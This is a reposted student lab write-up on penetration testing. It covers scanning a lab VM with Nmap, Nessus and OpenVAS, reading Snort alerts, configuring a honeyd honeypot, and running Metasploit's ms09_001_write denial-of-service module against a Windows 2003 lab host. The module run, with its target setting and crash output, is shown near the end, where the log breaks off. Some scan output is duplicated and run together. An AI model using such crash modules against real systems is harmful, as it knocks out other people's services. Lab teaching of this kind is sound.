Penetration Testing: Applications

Source: Internet   Published: 古典音乐音响知乎   Editor: 程序博客网   Time: 2024/04/29 21:08

http://www.dis9.com/penetration-testing-applications.html

Installing:

sudo apt-get install nmap nessus openvas-server openvas-client

We could not scan anything when running nmap from the Xen server, so we configured a default gateway on the VM:

route add default gw 145.100.105.193

At this point our system was exposed to the outside, so we added some rules to the iptables firewall:

iptables -A INPUT -s 145.100.105.193 -j ACCEPT
iptables -A INPUT -s 145.100.102.131 -j ACCEPT
iptables -I INPUT 3 -j DROP

On our workstation it was now possible to scan for open ports:

sudo nmap 145.100.105.196

Starting Nmap 5.00 ( http://nmap.org ) at 2010-04-01 13:47 CEST
Interesting ports on 145.100.105.196:
Not shown: 997 closed ports
PORT    STATE SERVICE
22/tcp  open  ssh
111/tcp open  rpcbind
631/tcp open  ipp

Nmap done: 1 IP address (1 host up) scanned in 13.56 seconds


In the snort log (/var/log/snort/alert) we saw the following entries:

[**] [1:469:3] ICMP PING NMAP [**]
[Classification: Attempted Information Leak] [Priority: 2]
04/01-13:47:31.348379 145.100.102.131 -> 145.100.105.196
ICMP TTL:44 TOS:0x0 ID:31604 IpLen:20 DgmLen:28
Type:8  Code:0  ID:12876   Seq:0  ECHO
[Xref => http://www.whitehats.com/info/IDS162]

[**] [122:1:0] (portscan) TCP Portscan [**]
[Priority: 3]
04/01-13:47:44.360634 145.100.102.131 -> 145.100.105.196
PROTO:255 TTL:0 TOS:0x0 ID:0 IpLen:20 DgmLen:168 DF

[**] [1:1418:11] SNMP request tcp [**]
[Classification: Attempted Information Leak] [Priority: 2]
04/01-13:47:44.396747 145.100.102.131:50051 -> 145.100.105.196:161
TCP TTL:38 TOS:0x0 ID:58065 IpLen:20 DgmLen:44
******S* Seq: 0xF21581F9  Ack: 0x0  Win: 0x1000  TcpLen: 24
TCP Options (1) => MSS: 1460
[Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0013][Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0012][Xref => http://www.securityfocus.com/bid/4132][Xref => http://www.securityfocus.com/bid/4089][Xref => http://www.securityfocus.com/bid/4088]

[**] [1:1421:11] SNMP AgentX/tcp request [**]
[Classification: Attempted Information Leak] [Priority: 2]
04/01-13:47:44.494539 145.100.102.131:50051 -> 145.100.105.196:705
TCP TTL:37 TOS:0x0 ID:45833 IpLen:20 DgmLen:44
******S* Seq: 0xF21581F9  Ack: 0x0  Win: 0xC00  TcpLen: 24
TCP Options (1) => MSS: 1460
[Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0013][Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0012][Xref => http://www.securityfocus.com/bid/4132][Xref => http://www.securityfocus.com/bid/4089][Xref => http://www.securityfocus.com/bid/4088]

So snort detected the Nmap portscan.

After installing nessus via aptitude we had to add a nessus user:

/opt/nessus/sbin/nessus-adduser
Login : jeroen
Login password :
Login password (again) :
Do you want this user to be a Nessus 'admin' user ? (can upload plugins, etc...) (y/n) [n]: y
User rules
----------
nessusd has a rules system which allows you to restrict the hosts
that jeroen has the right to test. For instance, you may want
him to be able to scan his own host only.

Please see the nessus-adduser manual for the rules syntax

Enter the rules for this user, and enter a BLANK LINE once you are done :
(the user can have an empty rules set)

Login             : jeroen
Password          : ***********
This user will have 'admin' privileges within the Nessus server
Rules             :
Is that ok ? (y/n) [y] y
User added

The next step is to start nessus:

/etc/init.d/nessusd start

Missing plugins. Attempting a plugin update...
Your installation is missing plugins. Please register and try again.
To register, please visit http://www.nessus.org/register/

We registered on the given website and received a mail with the activation code. We then registered the installation with the following command:

/opt/nessus/bin/nessus-fetch --register ****-****-****-****-****

Your activation code has been registered properly - thank you.
Now fetching the newest plugin set from plugins.nessus.org...
Your Nessus installation is now up-to-date.
If auto_update is set to 'yes' in nessusd.conf, Nessus will
update the plugins by itself.

After this process I tried to start nessus again:

/etc/init.d/nessusd start

No errors were given, so we could start the scan:

/opt/nessus/bin/nessuscmd 145.100.105.196

Starting nessuscmd 4.2.1
Scanning '145.100.105.196'...

+ Results found on 145.100.105.196 :
   - Port ssh (22/tcp) is open
   - Port sunrpc (111/tcp) is open
   - Port ipp (631/tcp) is open
   - Port postgresql (5432/tcp) is open

We got the following records in the snort log:

[**] [122:17:0] (portscan) UDP Portscan [**]
[Priority: 3]
04/01-14:31:15.612342 145.100.96.11 -> 145.100.104.21
PROTO:255 TTL:0 TOS:0xC0 ID:34166 IpLen:20 DgmLen:166

[**] [122:3:0] (portscan) TCP Portsweep [**]
[Priority: 3]
04/01-14:31:27.040300 145.100.102.131 -> 145.100.105.196
PROTO:255 TTL:0 TOS:0x0 ID:0 IpLen:20 DgmLen:168 DF

[**] [122:1:0] (portscan) TCP Portscan [**]
[Priority: 3]
04/01-14:31:27.040300 145.100.102.131 -> 145.100.105.196
PROTO:255 TTL:0 TOS:0x0 ID:0 IpLen:20 DgmLen:167 DF

[**] [1:1418:11] SNMP request tcp [**]
[Classification: Attempted Information Leak] [Priority: 2]
04/01-14:31:32.044917 145.100.102.131:56958 -> 145.100.105.196:161
TCP TTL:63 TOS:0x4 ID:43162 IpLen:20 DgmLen:60 DF
******S* Seq: 0x7AEF1E8D  Ack: 0x0  Win: 0x16D0  TcpLen: 40
TCP Options (5) => MSS: 1460 SackOK TS: 4044311 0 NOP WS: 6
[Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0013][Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0012][Xref => http://www.securityfocus.com/bid/4132][Xref => http://www.securityfocus.com/bid/4089][Xref => http://www.securityfocus.com/bid/4088]

[**] [1:1420:11] SNMP trap tcp [**]
[Classification: Attempted Information Leak] [Priority: 2]
04/01-14:31:37.378486 145.100.102.131:35607 -> 145.100.105.196:162
TCP TTL:63 TOS:0x4 ID:14118 IpLen:20 DgmLen:60 DF
******S* Seq: 0x7F2B8C6A  Ack: 0x0  Win: 0x16D0  TcpLen: 40
TCP Options (5) => MSS: 1460 SackOK TS: 4045644 0 NOP WS: 6
[Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0013][Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0012][Xref => http://www.securityfocus.com/bid/4132][Xref => http://www.securityfocus.com/bid/4089][Xref => http://www.securityfocus.com/bid/4088]

[**] [1:1421:11] SNMP AgentX/tcp request [**]
[Classification: Attempted Information Leak] [Priority: 2]
04/01-14:31:37.455136 145.100.102.131:51747 -> 145.100.105.196:705
TCP TTL:63 TOS:0x4 ID:50450 IpLen:20 DgmLen:60 DF
******S* Seq: 0x7F3E7E72  Ack: 0x0  Win: 0x16D0  TcpLen: 40
TCP Options (5) => MSS: 1460 SackOK TS: 4045664 0 NOP WS: 6
[Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0013][Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0012][Xref => http://www.securityfocus.com/bid/4132][Xref => http://www.securityfocus.com/bid/4089][Xref => http://www.securityfocus.com/bid/4088]

[**] [1:249:8] DDOS mstream client to handler [**]
[Classification: Attempted Denial of Service] [Priority: 2]
04/01-14:31:40.803471 145.100.102.131:34168 -> 145.100.105.196:15104
TCP TTL:63 TOS:0x4 ID:53980 IpLen:20 DgmLen:60 DF
******S* Seq: 0x82C26C79  Ack: 0x0  Win: 0x16D0  TcpLen: 40
TCP Options (5) => MSS: 1460 SackOK TS: 4046501 0 NOP WS: 6
[Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2000-0138][Xref => http://www.whitehats.com/info/IDS111]

[**] [122:1:0] (portscan) TCP Portscan [**]
[Priority: 3]
04/01-14:31:44.216729 145.100.102.131 -> 145.100.105.196
PROTO:255 TTL:0 TOS:0x4 ID:0 IpLen:20 DgmLen:168 DF

[**] [1:1421:11] SNMP AgentX/tcp request [**]
[Classification: Attempted Information Leak] [Priority: 2]
04/01-14:31:47.298076 145.100.102.131:55336 -> 145.100.105.196:705
TCP TTL:63 TOS:0x4 ID:49082 IpLen:20 DgmLen:60 DF
******S* Seq: 0x88EF7B46  Ack: 0x0  Win: 0x16D0  TcpLen: 40
TCP Options (5) => MSS: 1460 SackOK TS: 4048124 0 NOP WS: 6
[Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0013][Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0012][Xref => http://www.securityfocus.com/bid/4132][Xref => http://www.securityfocus.com/bid/4089][Xref => http://www.securityfocus.com/bid/4088]

[**] [1:1420:11] SNMP trap tcp [**]
[Classification: Attempted Information Leak] [Priority: 2]
04/01-14:31:47.750283 145.100.102.131:40739 -> 145.100.105.196:162
TCP TTL:63 TOS:0x4 ID:10439 IpLen:20 DgmLen:60 DF
******S* Seq: 0x8907EDAA  Ack: 0x0  Win: 0x16D0  TcpLen: 40
TCP Options (5) => MSS: 1460 SackOK TS: 4048237 0 NOP WS: 6
[Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0013][Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0012][Xref => http://www.securityfocus.com/bid/4132][Xref => http://www.securityfocus.com/bid/4089][Xref => http://www.securityfocus.com/bid/4088]
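The two Snort logs above are in Snort's "full" alert format. As an added example that is not part of the original post, the following Python script parses that format and summarises the records per source host and per signature; the sample records are copied from the first log above, and a source is reported as a scanner when Snort's sfPortscan preprocessor (generator id 122) fired for it.

```python
"""Parse Snort "full" alert records and summarise who scanned what."""
import re
from collections import Counter, defaultdict

# Constructed sample: three records copied from the first alert log above,
# separated by blank lines as Snort writes them to /var/log/snort/alert.
SAMPLE_ALERTS = """\
[**] [1:469:3] ICMP PING NMAP [**]
[Classification: Attempted Information Leak] [Priority: 2]
04/01-13:47:31.348379 145.100.102.131 -> 145.100.105.196
ICMP TTL:44 TOS:0x0 ID:31604 IpLen:20 DgmLen:28
Type:8  Code:0  ID:12876   Seq:0  ECHO
[Xref => http://www.whitehats.com/info/IDS162]

[**] [122:1:0] (portscan) TCP Portscan [**]
[Priority: 3]
04/01-13:47:44.360634 145.100.102.131 -> 145.100.105.196
PROTO:255 TTL:0 TOS:0x0 ID:0 IpLen:20 DgmLen:168 DF

[**] [1:1418:11] SNMP request tcp [**]
[Classification: Attempted Information Leak] [Priority: 2]
04/01-13:47:44.396747 145.100.102.131:50051 -> 145.100.105.196:161
TCP TTL:38 TOS:0x0 ID:58065 IpLen:20 DgmLen:44
******S* Seq: 0xF21581F9  Ack: 0x0  Win: 0x1000  TcpLen: 24
TCP Options (1) => MSS: 1460
[Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0013][Xref => http://www.securityfocus.com/bid/4132]
"""

# "[**] [gid:sid:rev] message [**]"
HEADER_RE = re.compile(r"^\[\*\*\] \[(\d+):(\d+):(\d+)\] (.+?) \[\*\*\]$")
# "[Classification: ...] [Priority: N]"; the classification part is optional
CLASS_RE = re.compile(r"^(?:\[Classification: (.+?)\] )?\[Priority: (\d+)\]$")
# "MM/DD-HH:MM:SS.usec src[:port] -> dst[:port]"
FLOW_RE = re.compile(
    r"^(\d\d/\d\d-\d\d:\d\d:\d\d\.\d+) "
    r"(\d+\.\d+\.\d+\.\d+)(?::(\d+))? -> (\d+\.\d+\.\d+\.\d+)(?::(\d+))?$")
XREF_RE = re.compile(r"\[Xref => ([^\]]+)\]")


def parse_alerts(text):
    """Return one dict per alert record; records are separated by blank lines."""
    alerts = []
    for block in re.split(r"\n\s*\n", text.strip()):
        lines = block.splitlines()
        m = HEADER_RE.match(lines[0])
        if not m:
            continue  # not a full-format record (e.g. a stray line); skip it
        gid, sid, rev, msg = m.groups()
        alert = {"gid": int(gid), "sid": int(sid), "rev": int(rev), "msg": msg,
                 "classification": None, "priority": None, "xrefs": []}
        for line in lines[1:]:
            c = CLASS_RE.match(line)
            if c:
                alert["classification"], alert["priority"] = c.group(1), int(c.group(2))
                continue
            f = FLOW_RE.match(line)
            if f:
                ts, src, sport, dst, dport = f.groups()
                alert.update(timestamp=ts, src=src, dst=dst,
                             sport=int(sport) if sport else None,
                             dport=int(dport) if dport else None)
                continue
            alert["xrefs"].extend(XREF_RE.findall(line))
        alerts.append(alert)
    return alerts


def summarise(alerts):
    """Count alerts per source and per signature; list sources flagged by sfPortscan (gid 122)."""
    per_source = Counter(a["src"] for a in alerts)
    per_signature = Counter((a["sid"], a["msg"]) for a in alerts)
    scanners = sorted({a["src"] for a in alerts if a["gid"] == 122})
    ports = defaultdict(set)
    for a in alerts:
        if a.get("dport") is not None:
            ports[a["src"]].add(a["dport"])
    return {"per_source": per_source, "per_signature": per_signature,
            "scanners": scanners,
            "ports_touched": {src: sorted(p) for src, p in ports.items()}}


if __name__ == "__main__":
    s = summarise(parse_alerts(SAMPLE_ALERTS))
    for src, n in s["per_source"].items():
        print(f"{src}: {n} alerts, destination ports {s['ports_touched'].get(src, [])}")
    print("sources flagged by the portscan preprocessor:", s["scanners"])
```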

Installing OpenVAS was a bit more complicated. Installing from the repository was not possible because of an error in the package, so we installed it from source. We took the newest version and tried to install it:

wget http://wald.intevation.org/frs/download.php/724/openvas-scanner-3.0.2.tar.gz
./configure

This resulted in an error: it had a few dependencies and needed the OpenVAS libraries, so I downloaded these:

wget http://wald.intevation.org/frs/download.php/717/openvas-libraries-3.0.4.tar.gz
./configure
configure: error: "glib >= 2.12.0 not found"

Another dependency… I searched for packages in the repository that included glib:

apt-file search glib

The packages that included glib were at most version 2.7, so we decided to install a slightly older OpenVAS version. We had a lot of help from this website: http://wikisecure.net/security/how-to-install-openvas-ubuntu9

First we made some preparations:

sudo apt-get update
sudo apt-get install build-essential libgtk2.0-dev libglib2.0-dev libssl-dev htmldoc libgnutls-dev libpcap0.8-dev bison libgpgme11-dev libsmbclient-dev snmp pnscan
sudo updatedb
sudo ldconfig
cd /home/user/Desktop
mkdir OpenVAS
cd OpenVAS

After this we downloaded the OpenVAS libraries, scanner and client and extracted them:

wget -c http://wald.intevation.org/frs/download.php/683/openvas-libraries-3.0.0.tar.gz
wget -c http://wald.intevation.org/frs/download.php/684/openvas-scanner-3.0.0.tar.gz
wget -c http://wald.intevation.org/frs/download.php/685/openvas-client-3.0.0.tar.gz
sudo tar -zxvf openvas-libraries-3.0.0.tar.gz
sudo tar -zxvf openvas-scanner-3.0.0.tar.gz
sudo tar -zxvf openvas-client-3.0.0.tar.gz

Installing OpenVAS Libraries:

cd openvas-libraries-3.0.0
sudo ./configure
sudo apt-get install cmake
sudo make
sudo make install
sudo ldconfig

Installing OpenVAS Scanner daemons:

cd ../openvas-scanner-3.0.0
sudo ./configure
sudo make
sudo make install

Installing OpenVAS Client GUI:

cd ../openvas-client-3.0.0
sudo ./configure
sudo make
sudo make install
sudo updatedb
sudo ldconfig

Next, we generated a certificate:

sudo openvas-mkcert
-------------------------------------------------------------------------------
            Creation of the OpenVAS SSL Certificate
-------------------------------------------------------------------------------

This script will now ask you the relevant information to create the SSL certificate of OpenVAS.
Note that this information will *NOT* be sent to anybody (everything stays local), but anyone with the ability to connect to your OpenVAS daemon will be able to retrieve this information.

CA certificate life time in days [1460]:
Server certificate life time in days [365]:
Your country (two letter code) [US]: NL
Your state or province name [none]: Noord-Holland
Your location (e.g. town) [Berlin]: Amsterdam
Your organization [OpenVAS Users United]:

-------------------------------------------------------------------------------
            Creation of the OpenVAS SSL Certificate
-------------------------------------------------------------------------------

Congratulations. Your server certificate was properly created.

/usr/local/etc/openvas/openvassd.conf updated
The following files were created:

. Certification authority:
   Certificate = /usr/local/var/lib/openvas/CA/cacert.pem
   Private key = /usr/local/var/lib/openvas/private/CA/cakey.pem

. OpenVAS Server :
    Certificate = /usr/local/var/lib/openvas/CA/servercert.pem
    Private key = /usr/local/var/lib/openvas/private/CA/serverkey.pem

Press [ENTER] to exit

Eventually we added an OpenVAS user:

sudo openvas-adduser
Create user account for OpenVAS Client. [It will be used to login to OpenVAS Client]

Using /var/tmp as a temporary file holder.

Add a new openvassd user
---------------------------------

Login : jeroen
Authentication (pass/cert) [pass] :
Login password :
Login password (again) :


User rules
---------------
openvassd has a rules system which allows you to restrict the hosts that jeroen has the right to test.
For instance, you may want him to be able to scan his own host only.

Please see the openvas-adduser(8) man page for the rules syntax.

Enter the rules for this user, and hit ctrl-D once you are done:
(the user can have an empty rules set)

User rules
---------------
openvassd has a rules system which allows you to restrict the hosts that jeroen has the right to test.
For instance, you may want him to be able to scan his own host only.

Please see the openvas-adduser(8) man page for the rules syntax.

Enter the rules for this user, and hit ctrl-D once you are done:
(the user can have an empty rules set)

Login             : jeroen
Password          : ***********

Rules             :

Is that ok? (y/n) [y]

user added.

Update the OpenVAS plugins folder (/usr/local/lib/openvas/plugins) with the latest set of plugins:

sudo openvas-nvt-sync

Start OpenVAS:

sudo openvassd

After this, put the IP address, or a list of IP addresses, of the host(s) you want to scan in a text file:

echo "145.100.105.196" >> iptoscan.txt

To scan the IP addresses we executed the following command:

OpenVAS-Client -q 127.0.0.1 9390 jeroen ******** iptoscan.txt scanresults.html -T html
Please choose your level of SSL paranoia (Hint: if you want to manage
many servers from your client, choose 2. Otherwise, choose 1. Or 3,
if you are paranoid.
2
*** Warning: paranoia_level=2 but "trusted_ca" file not found:
cacert.pem
*** Info: Found and enabled 16709 new plugins.

The output of the scan will be saved in scanresults.html.

  • Honey pots:
    • Set up a honey pot of choice (e.g. honeyd) in a VM (new or existing VM, your choice).
      • Configure it to act like a vulnerable system.
      • Run at least three services.

We used the following configuration file to create a VM for the honeypot:

import os, re
arch = os.uname()[4]
if re.search('64', arch):
    arch_libdir = 'lib64'
else:
    arch_libdir = 'lib'

kernel = "/usr/lib/xen/boot/hvmloader"
builder='hvm'

memory = 256
name = "ubuntu-desktop"
dhcp = "dhcp"
vif = [ 'bridge=eth2, mac=00:16:3e:59:34:7d' ]
disk = [ 'file:/home/jeroen/ids/disk1.img,hda,w', 'file:/home/jeroen/inr/isos/ubuntu-9.10-desktop-i386.iso,hdc:cdrom,r' ]
#disk = [ 'file:/home/jeroen/inr/hvm/ubuntu9.10.img,hda,w', ]
device_model = '/usr/' + arch_libdir + '/xen/bin/qemu-dm'
stdvga=0
sdl=0
vnc=1
vncviewer=1
boot = 'cd'
serial='pty'

We created a (sparse) image of 3GB:

dd if=/dev/zero of=disk1.img bs=1 count=0 seek=3G

And created the VM:

xm create xenhoney.cfg

Then we installed honeyd:

sudo apt-get install honeyd

First of all, honeyd has to answer ARP requests destined for the virtual hosts it creates. We used farpd for this, which is already installed by default on Ubuntu. For this we modified /etc/default/farpd:

INTERFACE="eth0"
NETWORK="145.100.105.192/27"

This means that farpd will listen on interface eth0 for incoming ARP requests and answer those for the network 145.100.105.192/27. After this step the daemon needs to be restarted:

/etc/init.d/farpd restart
* Restarting Fake-arpd daemon farpd
arpd[30280]: listening on eth0: arp and (dst net 145.100.105.192/27) and not ether src 00:16:3e:59:34:7d
                                                                         [ OK ]

Next, we had to modify the honeyd config file:

RUN="yes"
INTERFACE="eth0"
NETWORK=145.100.105.196

Now we can start the daemon:

/etc/init.d/honeyd start
 * Starting Honeyd daemon honeyd                                         [ OK ]

Next thing to do is to create a fake system:

vim /etc/honeypot/myfakemachine.conf

create windows
set windows personality "Microsoft Windows XP Professional"
add windows tcp port 80 "sh scripts/web.sh"
add windows tcp port 25 "perl scripts/snmp/fake-snmp.pl"
add windows tcp port 23 "perl scripts/telnet/faketelnet.pl"
add windows tcp port 139 open
add windows tcp port 137 open
add windows udp port 137 open
add windows udp port 135 open
set windows default tcp action reset
set windows default udp action reset
bind 145.100.105.197 windows

When I tried to start the fake system, I got the following error:

sudo honeyd -f /etc/honeypot/myfakemachine.conf 145.100.105.197

Honeyd V1.5c Copyright (c) 2002-2007 Niels Provos
honeyd[30337]: started with -f /etc/honeypot/myfakemachine.conf 145.100.105.197
honeyd[30337]: listening promiscuously on eth0: (arp or ip proto 47 or (udp and src port 67 and dst port 68) or (ip )) and not ether src 00:16:3e:59:34:7d
/etc/honeypot/honeyd.conf:2: Unknown personality "Windows NT 4.0 Server SP5-SP6"
honeyd: parsing configuration file failed

I changed the personality to "Microsoft Windows XP Professional". This solved the problem:

sudo honeyd -f /etc/honeypot/myfakemachine.conf 145.100.105.197

Honeyd V1.5c Copyright (c) 2002-2007 Niels Provos
honeyd[30343]: started with -f /etc/honeypot/myfakemachine.conf 145.100.105.197
honeyd[30343]: listening promiscuously on eth0: (arp or ip proto 47 or (udp and src port 67 and dst port 68) or (ip )) and not ether src 00:16:3e:59:34:7d
Honeyd starting as background process

We tried to ping the machine:

ping 145.100.105.197
PING 145.100.105.197 (145.100.105.197) 56(84) bytes of data.
From 145.100.105.196 icmp_seq=1 Destination Host Unreachable
From 145.100.105.196 icmp_seq=2 Destination Host Unreachable
From 145.100.105.196 icmp_seq=3 Destination Host Unreachable

But this was not really a great success… We tried to restart everything, double checked all configurations… In the end I tried to ping from another system than my HVM, and that worked just fine!

  • Scan it with Nmap including version detection.
    • Does nmap think that it’s a real device?

To scan for open ports with nmap, we used the following command:

12345678910111213141516171819202122232425262728293031323334353637
nmap -A -T4 145.100.105.197 Starting Nmap 5.00 ( http://nmap.org ) at 2010-04-12 13:08 CESTInteresting ports on 145.100.105.197:Not shown: 996 closed portsPORT    STATE SERVICE      VERSION23/tcp  open  tcpwrapped25/tcp  open  tcpwrapped80/tcp  open  tcpwrapped139/tcp open  netbios-ssn?No exact OS matches for host (If you know what OS is running on it, see http://nmap.org/submit/ ).TCP/IP fingerprint:OS:SCAN(V=5.00%D=4/12%OT=23%CT=1%CU=33139%PV=N%DS=2%G=Y%TM=4BC2FFD4%P=i686-OS:pc-linux-gnu)SEQ(SP=A0%GCD=1%ISR=A8%TI=I%CI=I%II=I%SS=S%TS=U)OPS(O1=M5B4OS:NW0%O2=M5B4NW0%O3=M5B4NW0%O4=M5B4NW0%O5=M5B4NW0%O6=M5B4NW0)WIN(W1=F424%WOS:2=F424%W3=F424%W4=F424%W5=F424%W6=F424)ECN(R=Y%DF=Y%T=40%W=F424%O=M5B4NWOS:0%CC=N%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=N%T=40%W=0%S=OS:A%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=40%W=F424%S=O%A=S+%F=AS%O=M5B4NW0%RDOS:=0%Q=)T3(R=Y%DF=Y%T=40%W=F424%S=O%A=O%F=AS%O=M5B4NW0%RD=0%Q=)T4(R=Y%DF=NOS:%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=N%T=40%W=0%S=A%A=S+%F=AR%O=%ROS:D=0%Q=)T6(R=Y%DF=N%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=N%T=40%W=0%OS:S=A%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=38%UN=0%RIPL=G%RID=G%RIPCKOS:=G%RUCK=G%RUD=G)IE(R=Y%DFI=Y%T=80%CD=Z) Network Distance: 2 hops Host script results:|_ nbstat: ERROR: Name query failed: TIMEOUT TRACEROUTE (using port 587/tcp)HOP RTT  ADDRESS1   1.42 router.students.os3.nl (145.100.102.129)2   0.23 spearow.studlab.os3.nl (145.100.104.21)3   0.90 145.100.105.197 OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 186.52 seconds
nmap -A -T4 145.100.105.197Starting Nmap 5.00 ( http://nmap.org ) at 2010-04-12 13:08 CESTInteresting ports on 145.100.105.197:Not shown: 996 closed portsPORT    STATE SERVICE      VERSION23/tcp  open  tcpwrapped25/tcp  open  tcpwrapped80/tcp  open  tcpwrapped139/tcp open  netbios-ssn?No exact OS matches for host (If you know what OS is running on it, see http://nmap.org/submit/ ).TCP/IP fingerprint:OS:SCAN(V=5.00%D=4/12%OT=23%CT=1%CU=33139%PV=N%DS=2%G=Y%TM=4BC2FFD4%P=i686-OS:pc-linux-gnu)SEQ(SP=A0%GCD=1%ISR=A8%TI=I%CI=I%II=I%SS=S%TS=U)OPS(O1=M5B4OS:NW0%O2=M5B4NW0%O3=M5B4NW0%O4=M5B4NW0%O5=M5B4NW0%O6=M5B4NW0)WIN(W1=F424%WOS:2=F424%W3=F424%W4=F424%W5=F424%W6=F424)ECN(R=Y%DF=Y%T=40%W=F424%O=M5B4NWOS:0%CC=N%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=N%T=40%W=0%S=OS:A%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=40%W=F424%S=O%A=S+%F=AS%O=M5B4NW0%RDOS:=0%Q=)T3(R=Y%DF=Y%T=40%W=F424%S=O%A=O%F=AS%O=M5B4NW0%RD=0%Q=)T4(R=Y%DF=NOS:%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=N%T=40%W=0%S=A%A=S+%F=AR%O=%ROS:D=0%Q=)T6(R=Y%DF=N%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=N%T=40%W=0%OS:S=A%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=38%UN=0%RIPL=G%RID=G%RIPCKOS:=G%RUCK=G%RUD=G)IE(R=Y%DFI=Y%T=80%CD=Z)Network Distance: 2 hopsHost script results:|_ nbstat: ERROR: Name query failed: TIMEOUTTRACEROUTE (using port 587/tcp)HOP RTT  ADDRESS1   1.42 router.students.os3.nl (145.100.102.129)2   0.23 spearow.studlab.os3.nl (145.100.104.21)3   0.90 145.100.105.197OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 186.52 seconds
  • -A: enables "aggressive" scanning, i.e. version detection together with OS detection, script scanning and traceroute (which is why the output above also contains the OS fingerprint, the nbstat script result and a traceroute)
  • -T4: selects a faster timing template

An attacker could suspect that this is a fake device, because nmap does not recognize the OS.

  • Scan it with Nessus and OpenVAS.
    • Do Nessus and OpenVAS think that it’s a real device?
/opt/nessus/bin/nessuscmd -q 145.100.105.197
Starting nessuscmd 4.2.1
Scanning '145.100.105.197'...

+ Results found on 145.100.105.197 :
   - Port telnet (23/tcp) is open
   - Port smtp (25/tcp) is open
   - Port http (80/tcp) is open
   - Port netbios-ns (137/tcp) is open
   - Port netbios-ssn (139/tcp) is open
sudo openvassd
All plugins loaded
sudo echo "145.100.105.196" >> iptoscan.txt
sudo OpenVAS-Client -q 127.0.0.1 9390 jeroen ids iptoscan.txt scanresults2.html -T html

Neither vulnerability scanner detects that this is not a real machine. The only related thing OpenVAS reports is that the OS is unknown.

  • Vulnerability testing:
    • Install Metasploit http://www.metasploit.com/framework/

We downloaded the Metasploit framework from:

http://www.metasploit.com/framework/download/

Then we installed the framework:

sudo sh framework-3.3.3-linux-i686.run

This installer will place Metasploit into the /opt/metasploit3 directory.
Continue (yes/no) > yes
Would you like to automatically update Metasploit?
AutoUpdate? (yes/no) > yes
Would you like to update Metasploit right now?
Update? (yes/no) > yes

sudo msfconsole
  • Try to exploit the weaknesses that are found with Nessus and OpenVAS.

We scanned a Windows 2003 Server for vulnerabilities. We enabled the following services:

  • RPC
  • Server
  • Netbios

Nessus gave the following results:

/opt/nessus/bin/nessuscmd 145.100.105.213
Starting nessuscmd 4.2.1
Scanning '145.100.105.213'...

+ Results found on 145.100.105.213 :
   - Port epmap (135/tcp) is open
   - Port netbios-ssn (139/tcp) is open
   - Port microsoft-ds (445/tcp) is open
   - Port blackjack (1025/tcp) is open
   - Port cap (1026/tcp) is open

The OpenVAS scan resulted in this:

As you can see, two vulnerabilities were found:

The first one is a rather well-known vulnerability, and is therefore also known to Metasploit:

msf > search ms09_001
[*] Searching loaded modules for pattern 'ms09_001'...

Auxiliary
=========

   Name                            Rank    Description
   ----                            ----    -----------
   dos/windows/smb/ms09_001_write  normal  Microsoft SRV.SYS WriteAndX Invalid DataOffset

We tried to exploit this by doing the following in msfconsole:

msf > use auxiliary/dos/windows/smb/ms09_001_write
msf auxiliary(ms09_001_write) > set RHOST 145.100.105.213
RHOST => 145.100.105.213
msf auxiliary(ms09_001_write) > run

Attempting to crash the remote host...
datalenlow=65535 dataoffset=65535 fillersize=72
datalenlow=55535 dataoffset=65535 fillersize=72
datalenlow=45535 dataoffset=65535 fillersize=72
datalenlow=35535 dataoffset=65535 fillersize=72
datalenlow=25535 dataoffset=65535 fillersize=72
datalenlow=15535 dataoffset=65535 fillersize=72
datalenlow=65535 dataoffset=55535 fillersize=72
datalenlow=55535 dataoffset=55535 fillersize=72
datalenlow=45535 dataoffset=55535 fillersize=72
datalenlow=35535 dataoffset=55535 fillersize=72
datalenlow=25535 dataoffset=55535 fillersize=72
datalenlow=15535 dataoffset=55535 fillersize=72
datalenlow=65535 dataoffset=45535 fillersize=72
datalenlow=55535 dataoffset=45535 fillersize=72
datalenlow=45535 dataoffset=45535 fillersize=72
datalenlow=35535 dataoffset=45535 fillersize=72
datalenlow=25535 dataoffset=45535 fillersize=72
datalenlow=15535 dataoffset=45535 fillersize=72
datalenlow=65535 dataoffset=35535 fillersize=72
datalenlow=55535 dataoffset=35535 fillersize=72
datalenlow=45535 dataoffset=35535 fillersize=72
datalenlow=35535 dataoffset=35535 fillersize=72
datalenlow=25535 dataoffset=35535 fillersize=72
datalenlow=15535 dataoffset=35535 fillersize=72
datalenlow=65535 dataoffset=25535 fillersize=72
datalenlow=55535 dataoffset=25535 fillersize=72
datalenlow=45535 dataoffset=25535 fillersize=72
datalenlow=35535 dataoffset=25535 fillersize=72
